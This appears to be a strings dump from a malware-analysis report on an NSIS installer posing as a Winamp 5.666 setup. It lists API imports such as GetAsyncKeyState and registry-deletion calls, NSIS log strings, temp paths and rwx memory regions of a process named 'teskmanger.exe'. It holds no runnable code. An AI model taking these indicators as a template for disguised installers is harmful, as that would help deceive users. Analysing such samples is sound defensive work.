GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationW
SHFileOperationW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegEnumKeyW
RegEnumKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
^.GU'
^.GU'
c\q|V8SH%x
c\q|V8SH%x
&%s.{
&%s.{
l%u0]
l%u0]
.reloc
.reloc
SSh4!
SSh4!
u.hl!
u.hl!
PeekNamedPipe
PeekNamedPipe
CreatePipe
CreatePipe
nsExec.dll
nsExec.dll
GetProcessHeap
GetProcessHeap
COMDLG32.dll
COMDLG32.dll
nsDialogs.dll
nsDialogs.dll
System.dll
System.dll
Dialer.dll
Dialer.dll
LangDLL.dll
LangDLL.dll
RdQ.Ai
RdQ.Ai
))))####
))))####
))##)))#
))##)))#
!.22,.)))
!.22,.)))
)2.)))),
)2.)))),
???8888
???8888
- ****%
- ****%
- ****%%%
- ****%%%
#022..
#022..
::22000 #
::22000 #
22220.00
22220.00
:222//20
:222//20
<:8222:00>
<:8222:00>
(1611..,,
(1611..,,
66111..,,%
66111..,,%
#1[[[[,)
#1[[[[,)
%1[[[[3/
%1[[[[3/
%1[[[[33-
%1[[[[33-
%2[[[[530/(
%2[[[[530/(
Nullsoft Install System v2.46.5-Unicode
Nullsoft Install System v2.46.5-Unicode
logging set to %d
logging set to %d
settings logging to %d
settings logging to %d
created uninstaller: %d, "%s"
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: success ("%s")
Exec: command="%s"
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack
Exch: stack
RMDir: "%s"
RMDir: "%s"
MessageBox: %d,"%s"
MessageBox: %d,"%s"
Delete: "%s"
Delete: "%s"
File: wrote %d to "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename failed: %s
Rename on reboot: %s
Rename on reboot: %s
Rename: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
SetFileAttributes: "%s":X
Sleep(%d)
Sleep(%d)
detailprint: %s
detailprint: %s
Call: %d
Call: %d
Aborting: "%s"
Aborting: "%s"
Jump: %d
Jump: %d
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
install.log
install.log
%u.%u%s%s
%u.%u%s%s
Skipping section: "%s"
Skipping section: "%s"
Section: "%s"
Section: "%s"
New install of "%s" to "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
*?|/":
*?|/":
invalid registry key
invalid registry key
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
x%c
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%s: failed opening file "%s"
\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
All Files|*.*
All Files|*.*
callback%d
callback%d
kernel32.dll
kernel32.dll
wininet.dll
wininet.dll
nsg3.tmp
nsg3.tmp
File: wrote 5120 to "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll"
File: wrote 5120 to "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll"
~1\Temp\nsg3.tmp\LangDLL.dll"
~1\Temp\nsg3.tmp\LangDLL.dll"
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
:\Program Files\winamp5666_full_all.exe"
:\Program Files\winamp5666_full_all.exe"
"%Program Files%\winamp5666_full_all.exe"
"%Program Files%\winamp5666_full_all.exe"
%Program Files%\Winamp
%Program Files%\Winamp
%Program Files%
%Program Files%
winamp5666_full_all.exe
winamp5666_full_all.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\winamp5666_full_all.exe
%Program Files%\winamp5666_full_all.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\install.ini
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\install.ini
Visit hXXp://VVV.winamp.com/ for updates.
Visit hXXp://VVV.winamp.com/ for updates.
5.6.6.3516
5.6.6.3516
teskmanger.exe_516_rwx_0099A000_00002000:
.KNyZX
.KNyZX
teskmanger.exe_516_rwx_675A6000_00003000:
.Qg
.Qg
*Rg`.Rg|)RgL Rg
*Rg`.Rg|)RgL Rg